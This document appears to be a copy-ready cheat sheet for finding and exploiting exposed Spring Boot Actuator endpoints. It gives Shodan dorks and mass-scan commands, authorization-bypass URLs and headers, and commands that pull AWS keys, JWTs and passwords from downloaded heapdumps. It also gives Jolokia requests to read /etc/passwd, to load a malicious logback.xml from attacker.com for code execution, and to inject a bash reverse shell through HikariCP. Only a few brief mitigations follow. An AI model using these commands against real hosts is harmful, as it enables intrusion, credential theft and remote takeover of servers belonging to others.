Spring Boot Actuator

A hands-on walkthrough to find, test and exploit Spring Boot Actuator endpoints

22 Categories70+ CommandsCopy Ready
Phase 1

Phase 1: Discovery - Shodan Dorks

1Shodan dork - find Spring Boot by favicon hash
org:target_org http.favicon.hash:116323821
2Shodan dork - SSL certificate + favicon
ssl:"example.com" http.favicon.hash:116323821
3Shodan dork - wildcard cert + favicon
ssl.cert.subject.CN:"*.example.com" http.favicon.hash:116323821
4Shodan dork - hostname + favicon
hostname:"example.com" http.favicon.hash:116323821
5Shodan dork - exact cert + favicon
ssl.cert.subject.CN:"example.com" http.favicon.hash:116323821
Phase 2

Phase 1: Discovery - Nuclei Scanner

1Nuclei scan - actuator templates
cat act.txt | nuclei -tags actuator -c 50
2Nuclei scan - jolokia templates
cat act.txt | nuclei -tags jolokia -es info,low -silent
Phase 3

Phase 1: Discovery - Dirsearch

1Dirsearch with Spring Boot wordlist
dirsearch -l target.txt -w /Seclist/Discovery/Web-Content/spring-boot.txt -x 404 -o output.txt
Phase 4

Phase 1: Discovery - Httpx Probe

1Httpx probe for common actuator paths
cat targets.txt | httpx-toolkit -silent -threads 50 -path '/actuator,/actuator/health,/actuator/info' -mc 200,401,403,302 > actuators.txt
Phase 5

Phase 2: Key Actuator Endpoints

1Actuator root - base endpoint
http://ipaddr/actuator
2Health - application health status
http://ipaddr/actuator/health
3Info - application info
http://ipaddr/actuator/info
4ENV - environment variables (HIGH RISK)
http://ipaddr/actuator/env
5Configprops - configuration properties
http://ipaddr/actuator/configprops
6Beans - Spring beans list
http://ipaddr/actuator/beans
7Mappings - request mappings
http://ipaddr/actuator/mappings
8Metrics - application metrics
http://ipaddr/actuator/metrics
9Loggers - logging configuration
http://ipaddr/actuator/loggers
10Threaddump - thread dump
http://ipaddr/actuator/threaddump
11Heapdump - memory dump (CRITICAL)
http://ipaddr/actuator/heapdump
12Jolokia - JMX bridge (CRITICAL)
http://ipaddr/actuator/jolokia
13Hawtio - management console
http://ipaddr/actuator/hawtio
14Httptrace - HTTP request trace (HIGH RISK)
http://ipaddr/actuator/httptrace
15Auditevents - audit events
http://ipaddr/actuator/auditevents
16Scheduledtasks - scheduled tasks
http://ipaddr/actuator/scheduledtasks
17Caches - cache management
http://ipaddr/actuator/caches
18Sessions - HTTP sessions
http://ipaddr/actuator/sessions
19Shutdown - graceful shutdown
http://ipaddr/actuator/shutdown
20Prometheus - metrics endpoint
http://ipaddr/actuator/prometheus
21Trace - request trace (legacy)
http://ipaddr/actuator/trace
22Conditions - auto-configuration report
http://ipaddr/actuator/conditions
23Refresh - refresh application context
http://ipaddr/actuator/refresh
24Restart - restart application
http://ipaddr/actuator/restart
25ENV property - specific env variable
http://ipaddr/actuator/env/{property}
Phase 6

Phase 2: Bypass - X-Forwarded-For

1Bypass with X-Forwarded-For header
curl -H "X-Forwarded-For: 127.0.0.1" http://example.com/actuator/env
Phase 7

Phase 2: Bypass - X-Original-URL

1Bypass with X-Original-URL header
curl -H "X-Original-URL: /actuator/env" http://example.com/some-allowed-path
Phase 8

Phase 2: Bypass - Semicolon / Matrix Tricks

1Semicolon path injection
http://example.com/;actuator
2Double slash bypass
http://example.com/actuator//env
3Dot suffix bypass
http://example.com/actuator/.
Phase 9

Phase 2: Bypass - Dot-Segment Traversal

1Dot-segment prefix
http://example.com/./actuator
2Traversal prefix
http://example.com/../actuator
Phase 10

Phase 2: Bypass - URL Encoding

1Percent-encoded traversal
http://example.com/%2e%2e/actuator
2Encoded slash in path
http://example.com/actuator%2Fenv
3Null byte injection
http://example.com/actuator%00
Phase 11

Phase 2: Bypass - Trailing Dots & Extensions

1Trailing dot
http://example.com/actuator.
2Double trailing dot
http://example.com/actuator..
3JSON extension
http://example.com/actuator.json
4HTML extension
http://example.com/actuator.html
Phase 12

Phase 2: Bypass - Query/Path Mix

1Query parameter bypass
http://example.com/actuator?path=env
2Query param on actuator path
http://example.com/actuator/env?some=param
3Encoded question mark bypass
http://example.com/actuator%3Fenv
Phase 13

Phase 2: Bypass - HTTP Verb & Headers

1HEAD verb bypass
curl -X HEAD http://example.com/actuator/env
2OPTIONS verb bypass
curl -X OPTIONS http://example.com/actuator/env
3X-Original-URL header
curl -H "X-Original-URL: /actuator/env" http://example.com/
4X-Rewrite-URL header
curl -H "X-Rewrite-URL: /actuator/env" http://example.com/
Phase 14

Phase 3: Heapdump - AWS Key Extraction

1Download heapdump
wget http://target.com/actuator/heapdump
2Extract AWS Access Keys from heapdump
strings heapdump | grep -B 2 -A 2 "AKIA"
3Extract all AWS Key IDs
strings -a -n 6 heapdump | grep -Eo 'AKIA[0-9A-Z]{16}' | sort -u > aws_keys.txt
Phase 15

Phase 3: Heapdump - Token Extraction

1Extract JWT tokens from heapdump
strings -a -n 10 heapdump | grep -Eo '[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+' | sort -u > jwt_candidates.txt
2Extract long alphanumeric tokens (API keys)
strings -a -n 10 heapdump | grep -Eo '[A-Za-z0-9_\-]{20,}' | sort -u > long_token_candidates.txt
3Extract all possible secrets from heapdump
strings -a -n 6 heapdump.hprof | grep -Ei 'password|passwd|pwd|secret|api[_-]?key|token|auth|authorization|bearer|aws|AKIA|ssh-rsa' -n > possible_secrets.txt
Phase 16

Phase 3: Jolokia - Local File Inclusion (LFI)

1Jolokia LFI - read /etc/passwd
curl "http://domain.com/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
Phase 17

Phase 3: Jolokia - LFI Bash Script

1Bulk LFI check script
while read ip; do response=$(curl -s -m 10 "http://$ip/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"); if echo "$response" | grep -q "root:"; then echo "VULNERABLE: $ip"; echo "$response" > "vulnerable_$ip.txt"; fi; done < ip_list.txt
Phase 18

Phase 3: Jolokia - RCE via logback

1Jolokia RCE - load malicious logback.xml
curl "http://domain.com/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/attacker.com!/logback.xml"
Phase 19

Phase 3: Jolokia - Reverse Shell via HikariCP

1HikariCP env injection - reverse shell
curl -X POST "http://ip/actuator/env" -H "Content-Type: application/json" -d '{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS '\''String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(new String[]{\"/bin/sh\", \"-c\", cmd}); return \"done\"; }'\''; CALL EXEC('\''bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'\'');"}'
Phase 20

Automation Tools

1SpringBootFinder - discover Spring Boot instances
https://github.com/xiaoliangli1128/SpringBootFinder
2S4S-Scanner - Spring Boot security scanner
https://github.com/onurgule/S4S-Scanner
Phase 21

Mitigation & Prevention

1Mitigation #1 - firewall + internal network only
Never expose actuators to public internet
2Mitigation #2 - protect all actuator endpoints
Use Spring Security with authentication/authorization
3Mitigation #3 - non-default path
Change base path: management.endpoints.web.base-path=/custom-secret-path
4Mitigation #4 - disable sensitive endpoints
Disable unused endpoints (heapdump, jolokia in production)
Tools

Tools & Resources

SpringBootFinder

Discover Spring Boot instances on the internet

S4S-Scanner

Spring Boot security scanner

Nuclei Actuator Templates

Nuclei templates for actuator detection

Dirsearch

Web content discovery with custom wordlists

Httpx-toolkit

Multi-purpose HTTP toolkit for probing endpoints

Shodan

Internet scanning engine for exposed services